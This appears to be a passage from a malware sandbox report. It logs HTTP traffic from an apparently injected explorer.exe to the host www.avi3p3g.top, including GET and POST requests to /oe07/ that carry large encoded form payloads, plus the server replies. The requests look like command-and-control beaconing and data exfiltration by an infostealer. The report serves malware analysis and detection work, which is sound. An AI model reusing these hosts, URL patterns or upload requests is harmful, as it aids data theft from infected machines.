Irdfm9vVVBNvZJBquUVt9mQbuyR5FIXJgh2CbDBDnGGIOJF3nSg9ONDSC(gUns59PBegxZBm_efkRQnNPGiieB6xtTyuPs62MgnlVhXIrMznXnKY7CsmsSJQd9evrQqAPw2jYQTXWDdo_22whUKDS61hzm41qzYIFKozh5QOf5U9Jgrivx6w75MoE~ya-djG_bTjSJyGwjBkL245yCRpAz05vDq9nyLrBHZmObkiozfmLXRh-lxA1MIVJFyoiaax0XRlEbB7uLMpgVpBIxxKgFqPYxVCxR-3IZbVM(xMuyWXa5CSx(zYMP32rrchnuIS_7LHdsv5Pmb5Ut9hb4GKC0YSOgp12jy6tnBYb6RszYa40OHbFQPC1y8TAL-LNsvPyb1szCLhimrMNGz3chaYyTIt9nkMt9aJzNMUWex2d9Z~i4F9RZXyEwt8WB1x4ZJVKTiLKN_0RzzEttJ5nZG3m10tcHrZjXy9WVxVxLjbXf3yyAzKWOtM4yNfbqAk4rqx0s6US(xCJu34qKiz8akKTEOXeTUoTHH0LCHQrcdpCKw9QvZWZOm27W36brfw0DsK-TOkZxXl5A1IntE6LrkOe9f6G0_MjlbqQWdWJEVreQSBuD-9DkprYOruxuhTKTux-MGrURO3QoENvzy78Ps(zHxZ6Oi05fLBytI~z8p329ldFyT4rqVdZu6qGPOzwtCgMDxvo(8NeejVRm-mqKi5emUaFbEkDpDn4nmVF5qiqRaescQ3hp28hjWM5XDGBMhsui_2P2Wu5F9pCEavz(DOwludmKdDRg-ajSuVy~ojC1DSN5VfjU7vOaEdzh-pynw4s3FnfwHmFlkOH~2XBkneGVSGyexYHB9SPA8Fpvxg3Dg142TM5(yhpfbDVpFrheYcvmgOEOdGmaFPZvcvFuhH705AyNc4_4rf-r6O3n3WxNdwbFYaqSgn-Tr7QmwKJkyJdL_WaknQwPMWLjnVsRrcteyaqPDlqaNNW11CgEyBWOhT-jTZm(Ek2zEUP(eKWEZ4jugI2pIJ3WGiFtpsBq2AIfP3XKp1cEQedYBGHpy0DIm6sK2J4VG3GpxVQf1IFaNqIYTGwtq2ihgVR2qtQlo3bmsmrEZ5LUQ(ZY8mV6iPlU9HcNfP_SwtmQorVLTWCgT1ePNwAVMjSr5963n3HIcofMXqbrFxXSi~UXHFWeP6bISC2nzlVsHEjuXHIfeevcXxTNkDuxoCrD1jF6IGYrWxDAEDQp1j_z1Z1(ZeGqQJBRMI0~sm7seqRRyleUPzFetqdR2jVG1A8zxC6fIKERfFxijwBRnskPsjFm8OA30mHiblTmv6DEBLCvgjimJwaDleH9j2e4Qyn4TAYt1uWmyZLQ771ppp488mNo66yuD3Dsst90uBIEpAqmjo01G6op5KqG9BDo0u5xI9sjnnozEKjRgR36RETdVF7bqrt4ErMVdJjA8Tlg9JXTh7coAIFjmfRXmOn5A5uax3rva5erYZ9y61Ieb07h1FD43BpCkD5Nq7d03~r9wr_RO7zXNxR9aubiwkiP-p7s276GrEdlSzk6TDM1eiZ9J8DXNqcT9f693lWeDA3zYC6JesxyKHZ9Vdgnds4x7ETtnByXHinF85PykJliSMhH6anNXboD1yxwVgusJUnaCmTgvxxOJ65Oa3YhZaJMZf9iTlpYkm8HaxnNj1dpj1OC8(AzBcO2Rf9FMazVvdWih6ChrEczJwU4F4iRkWACz3kKq(5n7mEmDXfuhh7EDgMC1jIeSHMFjl2z9Tu02RN3KLqW_Atwmwq8e2GXTYVLKoiQXaP7JX3exzbCYQcbQJaCwzeNwDgDGFNcBK71dHjctXPabGQtu12~yexD_mzACKr7G49orvTphlHYdQ72DJbNJNitbl7SSbqB3H_LAun1DQ8EBicWtg1L0EwiCs2ih0cAUNogyE1R1bb0HWBdXG64rdiUJDovdt_rHm7BgWoqw8kTNu84N2_C0Sfky6E0nuqmZfj5TZsH0Rd0hi5tIvgzIBwyDITWlo2T-7iqkReRbZRsSQ5pWSpkzz8HFLuc7z1KS0rJZ9h3yHjYzFYMFxdxECai53MERkA9iRMagN92PwRRTILXTgjA7wLAgpe9PZHV60OuMDiuS4dRPdYY-~fy7Yp8Rk5nR0jnHl7QILfXJ7Z8yPKYR5cRPaC5Luhf7U9SWaU3cnHimRL3ct7FI8z3fiV1bqDeXBOAd(5pyjsldKrMfswJEyUW3QyT6r21wWBQUn5jJik9C8FHUA29wKEZJLodNfibC67zYLezCDNtcD50Chh0LnLk7Y4KH~pIMqlAJn6R5~Ry6krkqtIOhjdUK1yIAwLO6s9QmHJ9d1d~5ZllhGxdyHkM1CtA6AI1jyRIa~57ELLndI0BvQ_JP1i5GZg9pPPb7jFz0PVQjK3fuUNslpveDAB0rqp5VCoHMYvuJCWBkQN5X3UcewSi5(tg5PuKC2qf-aix9w4nubc4L2VsRAE(WkyW5mRNurCRcbCslnYnBxguFTZTYZe2SmnjHcMtvbvqUA-(tngH9Okeikg78fA6Cc3Q
                                                                                                              Aug 22, 2022 20:04:30.249722004 CEST531OUTData Raw: 43 76 7e 30 63 2d 5a 65 53 72 28 76 4a 51 6d 73 41 66 52 49 67 56 35 51 70 7a 54 35 74 55 44 42 37 75 4c 2d 56 78 64 4b 37 57 61 48 6a 76 49 75 36 77 66 61 62 70 57 42 6b 78 6c 31 63 31 6c 39 67 5f 69 39 46 58 61 4d 33 44 39 47 70 6e 32 77 4a 55
                                                                                                              Data Ascii: Cv~0c-ZeSr(vJQmsAfRIgV5QpzT5tUDB7uL-VxdK7WaHjvIu6wfabpWBkxl1c1l9g_i9FXaM3D9Gpn2wJU0Go6FQSTPpTspSWjPmaqTadD9WUcIZ784Azw1SxZdiBaFG~cvoiHhiFoeBLX71yXoAMaXIm9v0D-2-HCcInegOYfA7Vo7UlnGeMbxipWJUCiHQZ8YRs3PKR6PnlwHaiipVdghdub5NWss0ZlKuAB8yHl(AEin14VS
                                                                                                              Aug 22, 2022 20:04:30.259088039 CEST537OUTData Raw: 72 57 54 6b 66 4e 79 78 38 6e 7e 45 67 47 63 41 42 5f 35 38 46 72 67 71 4a 7a 4c 74 64 48 7a 4b 56 6c 30 45 76 42 49 77 61 59 70 32 53 53 4f 47 58 54 4f 4b 7a 4b 6a 43 64 45 6f 70 4a 53 74 57 76 67 4c 6e 78 44 57 45 5a 6d 76 72 75 4d 66 36 63 72
                                                                                                              Data Ascii: rWTkfNyx8n~EgGcAB_58FrgqJzLtdHzKVl0EvBIwaYp2SSOGXTOKzKjCdEopJStWvgLnxDWEZmvruMf6crF96-A89Trw454adW1TQHeoK_ggSMh6mVVYteAOzmxn~U5Vff6NkQYYNXmzgv~xYrnM5ag_mg7GwE(uwD8V0M2tATc2yDT6mM9uJvItyQoeuK(N27p4Pi4Vmfj3qoX5zYnwp0VhX033nguHGwuDUWzD1WWpZzUXMNE
                                                                                                              Aug 22, 2022 20:04:30.259157896 CEST544OUTData Raw: 63 4b 41 35 4e 70 4e 62 6d 43 48 38 36 4a 4a 2d 39 79 68 6b 6a 37 50 76 44 57 76 73 4b 77 47 69 63 69 68 62 45 35 6b 58 39 78 77 64 6b 6e 5a 74 71 68 57 5a 4b 4f 28 2d 33 68 79 69 30 73 71 5a 58 70 73 33 7a 57 56 52 58 5a 50 67 4e 4a 44 43 78 52
                                                                                                              Data Ascii: cKA5NpNbmCH86JJ-9yhkj7PvDWvsKwGicihbE5kX9xwdknZtqhWZKO(-3hyi0sqZXps3zWVRXZPgNJDCxRDv8Zct4rg1GuxqNrzMdidTgGLIuugcs-d9CtCMHuegjQCoiXGwkw0toa7y7R38bUWPJxPUyz1h9hrQHDOIU-bXYkpkzwc8VL48lTqVScOMm0aZxHRDF1wnGnhsGTZH565v(WIYgweyebr7VmjWdYX-GunKQwQtXfl
                                                                                                              Aug 22, 2022 20:04:30.259217024 CEST547OUTData Raw: 46 67 4b 56 79 35 35 62 70 55 4e 65 70 4d 45 37 42 68 34 5f 49 49 31 56 69 2d 78 6b 78 32 57 54 59 76 28 32 78 77 6e 42 61 5a 69 35 6e 6a 31 42 44 71 7a 6b 38 32 64 43 55 57 4d 6f 73 5a 4e 49 77 35 28 51 30 7a 76 35 6b 59 58 70 38 46 66 38 63 36
                                                                                                              Data Ascii: FgKVy55bpUNepME7Bh4_II1Vi-xkx2WTYv(2xwnBaZi5nj1BDqzk82dCUWMosZNIw5(Q0zv5kYXp8Ff8c6lMN4R4JPPH3L(4HbNDsh~V0fJFlVoLl1lklYN12DaWIhvmJdfK9FWkPR2oGabnr654xldsx1NCoz8OC7V5SZQir0xOlcj0TRM8BBVFDXhghhymZfPEv-XWxLuWjtAjlX(gagw_a8Ivk3yz0jTpzp(iy3~Rplj8kNd
                                                                                                              Aug 22, 2022 20:04:30.259438992 CEST548OUTData Raw: 5a 51 7e 61 41 46 4c 54 79 6c 62 7a 37 35 43 54 57 62 51 31 35 38 4b 54 6a 59 57 4c 6e 5a 44 6e 39 39 67 6d 49 51 44 61 53 5f 35 4f 4f 54 59 70 6c 4a 6d 65 32 79 76 6b 4c 33 6c 78 6d 75 30 34 53 5a 79 65 4a 67 64 42 45 48 4c 35 61 50 67 72 48 5f
                                                                                                              Data Ascii: ZQ~aAFLTylbz75CTWbQ158KTjYWLnZDn99gmIQDaS_5OOTYplJme2yvkL3lxmu04SZyeJgdBEHL5aPgrH_u-1a4m0eei0Kaho_ARMJW-6ODYCn6D3fg0Ulg0qO(s1jcXBm9V4gZpSCB-QY2qxIEBioQkzbQ2Y5Kkdb4pFk0u6tJTWxIsZjs7NpoZSD4bg_IRMn8v35Fss_6Ik73bLEABKI~UBcdUUF5wGaPtFy5yKn3wiPL4Ccj
                                                                                                              Aug 22, 2022 20:04:30.259609938 CEST557OUTData Raw: 59 42 76 6a 6c 61 28 55 33 4a 66 45 32 6b 4e 6a 38 55 34 76 52 4b 41 32 35 63 73 49 66 55 59 59 38 30 48 7a 32 6e 62 58 68 69 76 36 63 61 76 68 49 30 50 47 4f 6a 35 65 37 38 73 71 34 7a 78 34 32 66 52 59 6e 6b 59 57 6e 4c 53 6f 33 6f 41 61 7a 4c
                                                                                                              Data Ascii: YBvjla(U3JfE2kNj8U4vRKA25csIfUYY80Hz2nbXhiv6cavhI0PGOj5e78sq4zx42fRYnkYWnLSo3oAazLetGapqSzTlLYrqSWlC47pPj2l2Kr7pUvRx0dVk6K2PvGbj65dRE2WTqb2S07iGXYpRNZzNhYbmBJb57sifXHHuWwuI4kaINh4Rf0OMUA26VWrwCjnpqEnBlQplVQQZsS~XVIVesaOYCkT886l7ThNnGxxr7gyU3dv
                                                                                                              Aug 22, 2022 20:04:30.268160105 CEST560OUTData Raw: 48 67 28 54 64 77 46 37 61 53 58 53 69 76 36 44 39 6c 59 5f 5a 4f 52 69 59 42 43 6c 35 4d 7e 72 42 76 38 7a 59 32 36 2d 75 31 6e 35 32 70 45 4c 56 31 64 59 52 58 63 67 43 4e 4a 71 36 77 76 44 55 33 70 6c 74 54 6b 4f 50 78 39 55 28 59 7e 46 7e 5f
                                                                                                              Data Ascii: Hg(TdwF7aSXSiv6D9lY_ZORiYBCl5M~rBv8zY26-u1n52pELV1dYRXcgCNJq6wvDU3pltTkOPx9U(Y~F~_Pk3d5ptMOE(rTDPP4BJjK7ICx0KkN9lqdJ6v98I_Qa16VerzQIY1jp1YOnBDQFhnLyGxO8XPSKeVTi3AblBCaF0EQ5M-H6N9RoXUcYdjZpHnaa0XSrqu2JeIad~c9DMyezFTDYww5PIBBZOpnPio8P8wsmQOwxS6Y
                                                                                                              Aug 22, 2022 20:04:30.268307924 CEST566OUTData Raw: 76 36 62 39 6d 79 70 45 6d 41 4a 42 46 4e 4f 32 6f 34 63 4d 36 72 6e 4a 39 39 62 2d 34 68 6e 72 52 5f 53 58 55 34 61 6d 79 71 37 61 48 6b 56 69 53 63 44 5a 6c 78 6f 6b 69 6a 4c 57 5a 65 6b 5f 74 7a 79 38 6a 4c 77 70 61 51 4f 37 70 37 77 48 49 78
                                                                                                              Data Ascii: v6b9mypEmAJBFNO2o4cM6rnJ99b-4hnrR_SXU4amyq7aHkViScDZlxokijLWZek_tzy8jLwpaQO7p7wHIxgIAlK5sz(oAgdsYQ7zp2w0(MJ0xmGSfGcYRr7yQV2xfR8Mp8vQ6ec4rpL6aOKJHHMWQLd9uyzLU05MZlIORjCALnLKQwK_DiWeN7ib5wHqXi8pucTtoP~KqVtuk7NojOSGq1lXrUF1nZP7yjoPfQtX3SLD3Mk7COW
                                                                                                              Aug 22, 2022 20:04:30.268511057 CEST569OUTData Raw: 4d 61 75 71 76 4b 72 75 4a 49 72 70 33 78 72 73 7e 66 52 47 37 42 30 55 4c 55 76 4f 34 55 42 4e 74 32 62 42 68 77 55 7a 55 6e 32 34 49 55 74 79 59 56 61 68 6d 5f 49 78 6a 37 70 38 72 4f 49 61 30 6d 63 72 54 7a 4f 31 34 4b 7a 7a 34 38 28 76 75 53
                                                                                                              Data Ascii: MauqvKruJIrp3xrs~fRG7B0ULUvO4UBNt2bBhwUzUn24IUtyYVahm_Ixj7p8rOIa0mcrTzO14Kzz48(vuS2qpsd_OGEhGHyAW-RTU2X4hLHqovGGaC~-KVfUTNv6(7g5H5TsZUDW3NyRUB7U4dLVOwnrlUlyDuGNFebCYC0S9hM6h7K2u8NCmbGI7a7ELudWHvQ0ruBq90XskG9OuvreXveUeqktgkV4ZH3yFTnOCSl55HG5D9G
                                                                                                              Aug 22, 2022 20:04:30.268735886 CEST578OUTData Raw: 6c 38 64 33 58 31 6f 4b 58 32 33 71 4e 36 71 38 37 54 6d 4e 77 5f 69 62 4a 38 45 44 7e 65 69 71 7e 46 34 4a 70 44 78 41 67 71 30 61 64 67 4f 52 5a 54 41 45 64 39 59 4f 34 4b 4e 4a 6f 64 63 51 71 38 42 69 28 37 35 63 55 6f 58 64 6f 4f 5a 64 47 46
                                                                                                              Data Ascii: l8d3X1oKX23qN6q87TmNw_ibJ8ED~eiq~F4JpDxAgq0adgORZTAEd9YO4KNJodcQq8Bi(75cUoXdoOZdGF78vfsIpBciVlZ13CUJmc4rM3Wc1eQjshEBkCjmh5qeTwHKNWkfvSqTrDn6LOQxoMvy8PowT1AdbMzAKSU7o-7J9uPCaOrC6FCwxbZ3Nf3a8A~KKRvtD2GeDf8SeuTcdAjYKB6VrXjo6fredvj6ZHha2rB8XoOD6MS
                                                                                                              Aug 22, 2022 20:04:30.358568907 CEST765INHTTP/1.1 405 Not Allowed
                                                                                                              Server: openresty
                                                                                                              Date: Mon, 22 Aug 2022 18:04:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 154
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_M8kY/GVOd1lo2mvUuU7f3GJZ08Sr6aJ+jz5IXKWP1rzOIt/SyTaMOEElc3nvd5DFoxcwS7Szgr0n6vc2Di3Zbw
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.11.204979045.117.11.10480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:06:14.519458055 CEST776OUTGET /oe07/?0HQL9628=RmBYcxyFm1VObidM2bAa3CbHkvDDW3a9A6yXLZmuWUWj0+12Mlvgw6TkPXwNhL4XoXbq&lP=z6AX5nfHP HTTP/1.1
                                                                                                              Host: www.avi3p3g.top
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Aug 22, 2022 20:06:14.759552956 CEST776INHTTP/1.1 307 Forbidden Redirect
                                                                                                              Location: http://117.24.14.2:60000/renwal2.html?yangzhou
                                                                                                              Content-Length: 105
                                                                                                              Content-Type: text/html
                                                                                                              Connection: Close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <html><head><title>Domain Name Forbidden</title></head><body><h1>Domain Name Forbidden</h1></body></html>
                                                                                                              Aug 22, 2022 20:06:14.759603977 CEST777INHTTP/1.1 404 NOTOK
                                                                                                              Date: Sat, 31 Dec 2005 23:59:59 GMT
                                                                                                              Content-Type: text/html;charset=GB2312
                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: 0
                                                                                                              Data Raw: 0d 0a 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 72 6f 77 73 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0d 0a 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 35 38 2e 32 32 30 2e 33 32 2e 32 31 30 3a 39 38 2f 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 6e 6f 72 65 73 69 7a 65 3e 0d 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0d 0a 00
                                                                                                              Data Ascii: <frameset framespacing="0" border="0" rows="0" frameborder="0"><frame name="main" src="http://58.220.32.210:98/" scrolling="auto" noresize></frameset>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.11.204979145.117.11.10480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:06:16.990226984 CEST785OUTPOST /oe07/ HTTP/1.1
                                                                                                              Host: www.avi3p3g.top
                                                                                                              Connection: close
                                                                                                              Content-Length: 245786
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.avi3p3g.top
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.avi3p3g.top/oe07/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 30 48 51 4c 39 36 32 38 3d 5a 45 4e 69 43 58 53 75 37 67 42 6f 41 53 56 4a 39 62 56 69 6f 6e 37 35 6e 39 4f 56 62 48 65 39 5a 75 76 65 58 4f 72 35 65 55 69 33 39 76 6c 51 43 45 36 35 31 74 61 79 66 57 77 42 6e 63 6f 6b 73 57 58 43 6c 32 51 45 69 34 47 58 59 68 32 51 4f 65 69 44 41 54 74 2d 6e 4f 52 44 31 46 76 73 32 76 36 49 62 48 4d 50 30 49 39 30 30 31 77 34 57 6b 65 35 4a 49 63 41 58 4a 5a 6e 70 48 33 70 38 4b 33 46 63 39 35 4d 35 7a 74 5f 66 56 6b 76 5a 4d 49 6f 62 76 4e 31 57 76 72 64 32 5a 56 71 6c 2d 62 42 58 71 5a 48 30 4b 43 58 6b 51 63 54 4b 66 5a 52 49 38 37 32 79 4d 30 72 70 38 6b 70 33 6e 78 36 63 33 55 48 46 67 71 30 46 41 79 6e 79 6d 50 47 43 53 6f 51 4d 44 75 4f 77 77 52 59 39 51 49 44 4c 35 66 30 35 4c 33 35 31 71 6c 54 61 6a 45 79 38 30 4f 56 6f 56 7a 55 59 4a 38 31 41 50 30 58 56 32 38 71 28 6c 48 72 4f 6f 7e 2d 75 58 42 5a 79 52 64 74 68 39 38 5a 4b 38 79 79 32 67 70 70 66 6f 72 50 56 49 28 5a 71 52 62 68 66 52 54 4c 69 33 45 62 59 51 7e 48 6e 64 44 6d 6a 76 71 71 61 4e 56 62 65 54 73 66 4e 5f 56 69 48 77 74 75 64 2d 6f 62 74 58 41 32 44 48 58 4b 7a 4a 64 33 73 64 66 44 62 6f 49 5f 63 68 34 56 51 58 6e 34 38 37 4f 43 35 4b 5a 69 67 5a 6e 4f 78 74 48 52 61 62 75 6d 49 51 38 42 31 68 61 72 70 61 6c 6b 42 66 32 6c 64 30 49 59 35 4c 4c 54 35 6f 4a 44 45 66 57 48 38 67 35 35 77 50 53 56 41 7a 44 32 79 4e 62 49 49 77 57 4a 77 73 41 47 51 79 70 47 57 7a 70 7a 36 73 6c 69 77 67 37 48 42 34 43 45 70 50 6c 66 5a 72 63 31 6c 43 6b 77 77 55 78 63 42 75 7a 4d 67 6a 4b 57 73 33 6f 4e 55 44 39 55 46 43 75 4d 55 30 7a 63 4e 55 6d 59 46 57 77 6b 4a 63 4f 6e 55 4d 6c 76 70 33 77 76 38 70 6f 6a 6d 42 37 75 49 72 43 4b 50 61 6a 33 32 45 48 65 37 48 46 78 39 64 6f 37 54 68 79 4b 76 35 78 42 4f 58 64 4d 4c 71 38 43 62 6e 47 50 6e 52 71 6f 56 4d 54 61 6f 70 48 7a 32 6c 57 43 73 39 6c 35 70 68 37 77 6d 7a 46 6c 46 63 66 77 31 2d 7a 49 63 31 7e 4e 51 36 34 65 57 47 78 77 6f 72 57 31 49 38 57 66 28 36 64 6f 4b 71 47 79 52 66 6a 6f 6b 47 45 73 37 39 4a 4d 74 64 4c 6a 45 4f 63 52 70 4a 76 6a 28 59 49 57 54 6c 30 69 69 69 72 55 54 6a 33 61 34 44 36 67 64 67 34 37 6c 33 44 45 53 43 37 52 73 42 75 71 65 43 67 44 31 68 49 38 6f 46 47 2d 4e 68 76 68 52 6c 36 50 66 56 68 44 41 43 44 76 7e 41 4d 7a 37 71 73 66 53 5a 44 48 53 5f 52 44 4b 6b 54 4f 79 6d 37 63 4d 37 6d 5a 79 4a 46 79 7e 58 64 6a 47 35 6d 4c 64 57 48 36 46 4b 42 78 63 77 43 30 77 74 37 62 6e 35 69 5f 42 5f 54 62 42 73 6c 68 77 61 54 51 42 66 57 66 28 62 6a 48 6b 79 4f 66 75 4f 62 64 62 72 45 6e 41 2d 37 4b 69 6c 75 50 71 35 78 54 4a 67 34 4b 5a 75 78 6d 65 45 72 4a 34 32 42 50 61 6a 69 4c 62 49 5a 78 36 4d 52 33 4c 62 4d 56 71 67 6c 63 35 78 32 58 59 47 67 69 43 6c 31 66 39 56 30 68 4c 50 65 4a 39 54 6e 65 4c 4f 56 69 55 35 73 53 55 5f 4f 5a 52 56 50 53 58 74 77 6d 44 77 43 38 73 44 6b 58 47 51 52 52 4d 73 54 63 69 30 66 53 63 4f 51 36 4e 65 47 4e 57 78 53 48 61 6e 39 4a 6b 38 71 58 71 38 74 77 6d 70 45 6d 58 79 31 2d 4b 36 63 76 74 6e 75 4c 42 6a 6b 76 33 4b 4d 4f 4b 58 54 34 64 6a 67 33 67 66 65 32 61 6d 79 54 6d 70 46 42 79 74 34 45 47 78 43 4f 73 43 76 55 48 32 69 6d 76 62 54 6d 62 72 45 34 53 47 6c 55 37 36 54 48 4d 4c 57 74 46 53 4e 41 35 6b 75 79 36 5f 6c 4d 6e 4a 6e 36 79 36 6b 53 4c 44 66 53 68 69 6d 66 49 5f 4b 41 78 4f 44 50 6f 6c 65 56 79 55 35 72 71 78 41 50 45 56 6b 33 62 7a 70 6e 64 2d 43 69 70 38 69 48 63 78 72 74 56 79 4f 5a 54 72 77 6b 6b 65 45 59 50 53 49 4f 63 69 71 4d 64 61 59 4c 38 72 63 5f 58 7a 55 57 5a 6e 38 31 50 6f 73 34 37 6c 47 79 43 4f 58 72 58 4c 28 67 46 58 32 51 6c 2d 56 57 52 7a 33 6d 37 57 57 75 62 49 74 79 4d 38 61 6b 30 54 48 67 46 6c 6f 7a 6f 69 4a 62 45 42 49 75 42 55 55 5f 61 52 44 42 30 64 43 35 61 34 50 65 42 41 33 61 52 76 47 33 45 4b 51 53 5a 64 69 44 59 79 5a 6d 6d 73 35 30 76 49 4f 47 68 48 31 33 54 58 52 6a 6b 56 6f 70 38 4c 34 79 6c 66 58 6b 58 79 30 5f 30 51 56 44 4e 43 41 36 41 76 63 74 36 6b 4c 4d 64 5f 28 76 6b 38 72 52 6b 55 37 78 31 73 28 75 30 44 33 39 28 36 55 55 68 71 68 38 51 43 35 68 45 6e 30 47 51 4f 54 74 5a 41 45 64 35 65 74 72 62 6f 4f 4f 69 74 62 76 57 6d 75 53 53 67 43 43 30 37 49 38 43 5f 33 33 46 47
                                                                                                              Data Ascii: 0HQL9628=ZENiCXSu7gBoASVJ9bVion75n9OVbHe9ZuveXOr5eUi39vlQCE651tayfWwBncoksWXCl2QEi4GXYh2QOeiDATt-nORD1Fvs2v6IbHMP0I9001w4Wke5JIcAXJZnpH3p8K3Fc95M5zt_fVkvZMIobvN1Wvrd2ZVql-bBXqZH0KCXkQcTKfZRI872yM0rp8kp3nx6c3UHFgq0FAynymPGCSoQMDuOwwRY9QIDL5f05L351qlTajEy80OVoVzUYJ81AP0XV28q(lHrOo~-uXBZyRdth98ZK8yy2gppforPVI(ZqRbhfRTLi3EbYQ~HndDmjvqqaNVbeTsfN_ViHwtud-obtXA2DHXKzJd3sdfDboI_ch4VQXn487OC5KZigZnOxtHRabumIQ8B1harpalkBf2ld0IY5LLT5oJDEfWH8g55wPSVAzD2yNbIIwWJwsAGQypGWzpz6sliwg7HB4CEpPlfZrc1lCkwwUxcBuzMgjKWs3oNUD9UFCuMU0zcNUmYFWwkJcOnUMlvp3wv8pojmB7uIrCKPaj32EHe7HFx9do7ThyKv5xBOXdMLq8CbnGPnRqoVMTaopHz2lWCs9l5ph7wmzFlFcfw1-zIc1~NQ64eWGxworW1I8Wf(6doKqGyRfjokGEs79JMtdLjEOcRpJvj(YIWTl0iiirUTj3a4D6gdg47l3DESC7RsBuqeCgD1hI8oFG-NhvhRl6PfVhDACDv~AMz7qsfSZDHS_RDKkTOym7cM7mZyJFy~XdjG5mLdWH6FKBxcwC0wt7bn5i_B_TbBslhwaTQBfWf(bjHkyOfuObdbrEnA-7KiluPq5xTJg4KZuxmeErJ42BPajiLbIZx6MR3LbMVqglc5x2XYGgiCl1f9V0hLPeJ9TneLOViU5sSU_OZRVPSXtwmDwC8sDkXGQRRMsTci0fScOQ6NeGNWxSHan9Jk8qXq8twmpEmXy1-K6cvtnuLBjkv3KMOKXT4djg3gfe2amyTmpFByt4EGxCOsCvUH2imvbTmbrE4SGlU76THMLWtFSNA5kuy6_lMnJn6y6kSLDfShimfI_KAxODPoleVyU5rqxAPEVk3bzpnd-Cip8iHcxrtVyOZTrwkkeEYPSIOciqMdaYL8rc_XzUWZn81Pos47lGyCOXrXL(gFX2Ql-VWRz3m7WWubItyM8ak0THgFlozoiJbEBIuBUU_aRDB0dC5a4PeBA3aRvG3EKQSZdiDYyZmms50vIOGhH13TXRjkVop8L4ylfXkXy0_0QVDNCA6Avct6kLMd_(vk8rRkU7x1s(u0D39(6UUhqh8QC5hEn0GQOTtZAEd5etrboOOitbvWmuSSgCC07I8C_33FGK_wny7SH1B~jpJ(z6QAmEB12EhD47pVpiYASjKd2f88HRGSPO4VCY7eWxsxZxlOQsyOOztpRkLXhhAZ2WjoP2utPaS1-HzCgN6mCiI6itGuu82eeezQloEcgzqE6rTSWj1BjLnsvjGFR5dpE6J74lFWSnxNSDd8WbooIsuEkBZYmoU9auFYKs1PRSwBv3PN3RWbiHlF4h_IgQtl1pB3I3VlIQsG-RxoFR78bsgL_~jlJpibbIbvALaqhWXyo22zYVvwkGbGlQgSXTUSEK7jcFYXKxBaZKOn2rKw_bOLqRxzP57Y65wdJfuGjUlaKN7tjdqrFcxbnAOPT~zosjGMkyFdcygfZTR1LD3OrVYoXpwwtY-xVkS8gve7aJNCDePY-8xv0MhL1VSivhFlWCdAV1x4PD8WpugqHUodeiZYdSKjPZCpJsYjkY3S_RhQFFg87KK9RSlNIYUvsAkPchOKjh8HiojAkbof1lVIxnVVR1oCP0-Keo6CCFI557IgI42uER8PAKfl1o08139ueE6jo(69Ky0xlC-CHTGo56VVzg5KO3UQvRipE89(dEzuWXzQrbZbImKLnQ_pEGv2RZX0ZVGPSWkqEdM(qjWFyv1C4Fw(yyLisWU2IhyAiq-ANZRlwbewFn1vQvbdvndJaplaswzWxAYK2aklmVTx7RAvZKWhan6L_rnuykX2C1Zf-h2l6FiSPCqb_jkVPeVjdtaoMdp(P62FR8r~FYKdx8DZu(Jfyx4iv1qQ2aOCaERDfxcHY8RrcUar_NaO3dVHVUx1aQMMxERTc6flciefZWpJLPot3D1cDsXKbS7wEzvymb14n1xNLgvw51GuAG7Gg5a3EkExKU7G